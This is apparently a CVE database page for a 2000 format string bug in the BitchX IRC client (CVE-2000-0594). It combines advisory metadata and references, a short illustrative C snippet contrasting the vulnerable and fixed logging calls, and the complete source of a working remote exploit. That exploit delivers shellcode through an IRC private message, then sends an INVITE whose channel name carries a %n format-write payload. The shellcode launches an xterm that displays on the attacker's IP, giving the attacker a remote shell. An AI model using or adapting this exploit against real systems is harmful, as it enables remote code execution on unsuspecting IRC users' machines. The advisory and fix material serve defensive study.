CVE-2000-0594
CVSS 5.0
Published: 2000-07-04 00:00:00
Revised: 2008-09-10 15:05:10

[Original] BitchX IRC client does not properly cleanse an untrusted format string, which allows remote attackers to cause a denial of service via an invite to a channel whose name includes special formatting characters.


[CNNVD] BitchX IRC client "/INVITE" format string vulnerability (CNNVD-200007-004)

The BitchX IRC client does not properly sanitize an untrusted format string; a remote attacker can cause a denial of service via an invite to a channel whose name contains special formatting characters.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:caldera:openlinux_eserver:2.3
cpe:/o:caldera:openlinux_edesktop:2.4
cpe:/o:mandrakesoft:mandrake_linux:2007  MandrakeSoft Mandrake Linux 2007.0
cpe:/o:freebsd:freebsd:3.5  FreeBSD 3.5
cpe:/a:caldera:openlinux_desktop:2.3
cpe:/a:caldera:openlinux_ebuilder:2.3
cpe:/o:freebsd:freebsd:4.0  FreeBSD 4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0594
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0594
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-004
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/4897.php
(VENDOR_ADVISORY)  XF  irc-bitchx-invite-dos
http://www.securityfocus.com/bid/1436
(UNKNOWN)  BID  1436
http://www.redhat.com/support/errata/RHSA-2000-042.html
(UNKNOWN)  REDHAT  RHSA-2000:042
http://www.calderasystems.com/support/security/advisories/CSSA-2000-022.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-022.0
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0018.html
(UNKNOWN)  VULN-DEV  20000704 BitchX /ignore bug
http://archives.neohapsis.com/archives/freebsd/2000-07/0042.html
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:32
http://archives.neohapsis.com/archives/bugtraq/2000-07/0105.html
(UNKNOWN)  BUGTRAQ  20000707 BitchX update
http://archives.neohapsis.com/archives/bugtraq/2000-07/0098.html
(UNKNOWN)  BUGTRAQ  20000707 CONECTIVA LINUX SECURITY ANNOUNCEMENT - BitchX
http://archives.neohapsis.com/archives/bugtraq/2000-07/0026.html
(UNKNOWN)  BUGTRAQ  20000704 BitchX exploit possibly waiting to happen, certain DoS

- Vulnerability information

BitchX IRC client "/INVITE" format string vulnerability
Medium severity  Format string
2000-07-04 00:00:00  2006-09-05 00:00:00
Remote
The BitchX IRC client does not properly sanitize an untrusted format string; a remote attacker can cause a denial of service via an invite to a channel whose name contains special formatting characters.

- Advisories and patches

Use the supplied patches or upgrade to a patched version. See the advisories under the "Credit" tab for vendor-specific packages.
BitchX IRC Client 75p3
BitchX IRC Client 1.0 c16

- Vulnerability information (20060)

BitchX IRC Client 75p1/75p3/1.0 c16 "/INVITE" Format String Vulnerability (EDBID:20060)
linux remote
2000-07-05 Verified
0 RaiSe
N/A
source: http://www.securityfocus.com/bid/1436/info

BitchX IRC clients, versions 75 up to and including 1.0c16, are vulnerable to a Denial of Service and possible remote execution of code. By /invite-ing someone to a channel name containing formatting characters (%s, %n, etc) an IRC user can cause the targeted user's BitchX client to seg-fault. This is caused by the fact that bitchx passes the channel name from the invite into the logging function as its format string [which is used directly in a vsprintf], rather than as an argument to the format. This also affects the KILL command.
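The defect described above, as an added illustration that is neither BitchX code nor part of the exploit below: a hypothetical printf-style logger in the shape the description blames, the vulnerable call that hands the channel name to it as the format, the corrected call that passes the name as an argument, and a check a client or log pipeline can use to flag INVITEs whose channel name carries a conversion directive. All function names are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logger in the shape the advisory describes: a
 * printf-style wrapper that hands whatever it receives to the
 * vsnprintf family as the format string. */
static int irc_log(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int written;

    va_start(ap, fmt);
    written = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return written;
}

/* Vulnerable call pattern: the channel name from the INVITE is the
 * format string, so every '%' in it is interpreted. The demo below
 * feeds it only "%%", the one directive that consumes no argument,
 * so the behaviour stays well-defined while still showing that the
 * name is parsed rather than copied. */
int log_invite_vulnerable(char *out, size_t n, const char *chan)
{
    return irc_log(out, n, chan);
}

/* Fixed call pattern: the channel name is an argument to a fixed
 * format, so it is copied verbatim and never parsed. */
int log_invite_fixed(char *out, size_t n, const char *chan)
{
    return irc_log(out, n, "%s", chan);
}

/* Detection aid: flag any untrusted channel name that carries a '%'
 * at all; a legitimate IRC channel name has no reason to contain one. */
int channel_has_directive(const char *chan)
{
    return strchr(chan, '%') != NULL;
}

int main(void)
{
    char line[64];

    /* Constructed sample channel name containing an escaped percent. */
    log_invite_vulnerable(line, sizeof line, "#chan%%");
    printf("vulnerable: %s\n", line);   /* parsed:   #chan%  */
    log_invite_fixed(line, sizeof line, "#chan%%");
    printf("fixed:      %s\n", line);   /* verbatim: #chan%% */
    return 0;
}
```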

/*
 *  BitchX Xploit by RaiSe
 *  Tested with version 1.0c16(+) in:        redhat 6.0 (2.2.16)
 *                                           redhat 7.0 (2.2.16)
 *                                           debian 2.2 (2.2.16)
 *
 *  NetSearch Ezine Staff
 *  http://www.netsearch-ezine.com
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 6667

int soc_local,snick;
struct sockaddr_in addr_local;
struct hostent *server;
char buf[1024], cmd[512], formatbuf[1024], ip[64], *p;

int irc(char *n,char *s,char *sc);
int format(int v);

static char shellcode[256] =    // by RaiSe
"\xeb\x5b\x5e\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xc3\x75\x47\x31"
"\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b\x31\xc9\xb1\x09"
"\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2"
"\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e"
"\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36\x8d\x56\x46"
"\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xa0\xff"
"\xff\xff/usr/X11R6/bin/xterm8-ut8-display8";

char nops4[] = "\x90\x90\x90\x90";


// main()
int main(int argc, char *argv[])
{

        if (argc!=5)
        {       
                printf("\nBitchX Xploit by RaiSe\n");
                printf("http://www.netsearch-ezine.com\n");
                printf("\nuse: %s nick irc-server my-ip dist\n",argv[0]);
                printf("\ndist = 1 --> redhat 6.0\n"
                                "dist = 2 --> redhat 7.0\n"
                                "dist = 3 --> debian 2.2\n\n");
                exit(0);
        }

        sprintf(ip,"%s:0K",argv[3]);
        strcat(shellcode,ip);

        printf("\nBitchX Xploit by RaiSe\n");
        printf("http://www.netsearch-ezine.com\n");
        puts("\ndoing it..");

        snick=strlen(argv[1]);
        format(atoi(argv[4]));
        irc (argv[1],argv[2],formatbuf);
        printf("finished\n\n");

        return(0);

} // end main()

// irc()
int irc(char *n,char *s,char *sc)
{

        if ((server = gethostbyname(s)) == 0) 
        {
                printf("error al resolver el host\n");
                exit(0);
        }

        if ((soc_local=socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("error al crear el socket\n");
                exit(0);
        }

        bzero((char *) &addr_local, sizeof(addr_local));

        addr_local.sin_family = AF_INET;
        addr_local.sin_port = htons(PORT);
        memcpy(&addr_local.sin_addr, server->h_addr, server->h_length);

        if ((connect(soc_local,(struct sockaddr *) &addr_local,sizeof(addr_local)))
                        == -1)
        {
                printf("error al conectar con el servidor\n");
                exit(0);
        }

        p=buf;

        // user
        sprintf(cmd,"user k k k k\n");
        write(soc_local,cmd,strlen(cmd));

        // nick
        sprintf(cmd,"nick rxkfe\n");
        write(soc_local,cmd,strlen(cmd));

        // pong
        while(1)
        {
                read(soc_local,p,1);
                if ((*p=='\n') && (strstr(buf,"PING :")))
                {
                        p = (strstr(buf,"PING :")) + strlen("PING :");
                        sprintf(cmd,"PONG %s",p);
                        write(soc_local,cmd,strlen(cmd));
                        break;
                }
                if (*p=='\n')
                        p=buf;
                p++;
        } 

        // ctcp
        sprintf(cmd,"privmsg %s :\x01%s%s%s%s%s%s\x01\n"
                        ,n,nops4,nops4,nops4,nops4,nops4,shellcode);

        write(soc_local,cmd,strlen(cmd));

        sleep(2);

        // invite
        sprintf(cmd,"invite %s #%s\n",n,sc);
        write(soc_local,cmd,strlen(cmd));

        sleep(2);
        return(0);

} // end irc()

// format()
int format(int v)
{

        if ((v!=1) && (v!=2) && (v!=3))
        {
                printf("\ndist = 1 --> redhat 6.0\n"
                       "dist = 2 --> redhat 7.0\n"
                       "dist = 3 --> debian 2.2\n\n");
                printf("exiting..\n\n");
                exit(0);
        }


if (v==1)
{
int n, nr, a1, nx, nn = 0x150;
char dire[4][8] = { "\x60","\x61","\x62","\x63" };
int a2 = 0x1b5 - 0xdb;
int a3 = 0xff - 0xb5;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 126;
        nr = 0x6;
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 126;
        nr = 0x5;
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 126;
        nr = 0x4;
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 126;
        nr = 0x3;
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 126;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 129;
        nr = 0x5;
        nn = 0x158;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 129;
        nr = 0x4;
        nn = 0x158;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 129;
        nr = 0x3;
        nn = 0x158;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 129;
        nr = 0x2;
        nn = 0x158;
}

a1 = 0x10db - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%s\xea\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==2)
{
int n, nr, a1, nx, nn = 0x138;
char dire[4][8] = { "\xbc","\xbd","\xbe","\xbf" };
int a2 = 0x1b2 - 0xc1;
int a3 = 0xff - 0xb2;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 117;
        nr = 0x6;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 117;
        nr = 0x5;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 117;
        nr = 0x4;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 117;
        nr = 0x3;
        strcpy(dire[0],"\xbc");
        strcpy(dire[1],"\xbd");
        strcpy(dire[2],"\xbe");
        strcpy(dire[3],"\xbf");
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 117;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 120;
        nr = 0x5;
        nn = 0x140;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 120;
        nr = 0x4;
        nn = 0x140;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 120;
        nr = 0x3;
        nn = 0x140;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 120;
        nr = 0x2;
        nn = 0x140;
}

a1 = 0x10c1 - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%s\xe7\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==3)
{
int n, nr, a1, nx, nn = 0x180;
char dire[4][8] = { "\x80","\x81","\x82","\x83" };
int a2 = 0x1b3 - 0xa4;
int a3 = 0xff - 0xb3;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
        sprintf(nops,"\x90%s",nops4);
        nx = 144;
        nr = 0x6;
        break;
case 2:
        sprintf(nops,"%s",nops4);
        nx = 144;
        nr = 0x5;
        break;
case 3:
        sprintf(nops,"\x90\x90\x90");
        nx = 144;
        nr = 0x4;
        break;
case 4:
        sprintf(nops,"\x90\x90");
        nx = 144;
        nr = 0x3;
        break;
case 5:
        sprintf(nops,"\x90");
        nx = 144;
        nr = 0x2;
        break;
case 6:
        sprintf(nops,"%s",nops4);
        nx = 147;
        nr = 0x5;
        nn = 0x188;
        break;
case 7:
        sprintf(nops,"\x90\x90\x90");
        nx = 147;
        nr = 0x4;
        nn = 0x188;
        break;
case 8:
        sprintf(nops,"\x90\x90");
        nx = 147;
        nr = 0x3;
        nn = 0x188;
        break;
case 9:
        sprintf(nops,"\x90");
        nx = 147;
        nr = 0x2;
        nn = 0x188;
        strcpy(dire[0],"\x70");
        strcpy(dire[1],"\x71");
        strcpy(dire[2],"\x72");
        strcpy(dire[3],"\x73");
}

a1 = 0x10a4 - nn - 0x10 - 0xc - nr;

  for (n = 0; n < nx ; n += 3)
    strcpy(&xx[n], "%8x");

  sprintf(formatbuf,
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%s\xe8\xff\xbf"
         "%s"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         "%%%dx%%n"
         ,nops,dire[0],nops4,dire[1],nops4,dire[2],
         nops4,dire[3],xx,a1,a2,a3,a4);
}

return(0);

} // end format()

// 0x00

- Vulnerability information

1445
BitchX IRC Client INVITE Format String DoS
Remote / Network Access Denial of Service
Loss of Integrity Third-Party Solution
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-07-05 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

  • Bugtraq ID: 1436
  • CVE ID: 2000-0594 (see also: NVD)
  • Exploit Database: 20060
  • ISS X-Force ID: 4897
  • Generic Informational URL: RHSA-2000:042-01

- Vulnerability author

Unknown or Incomplete
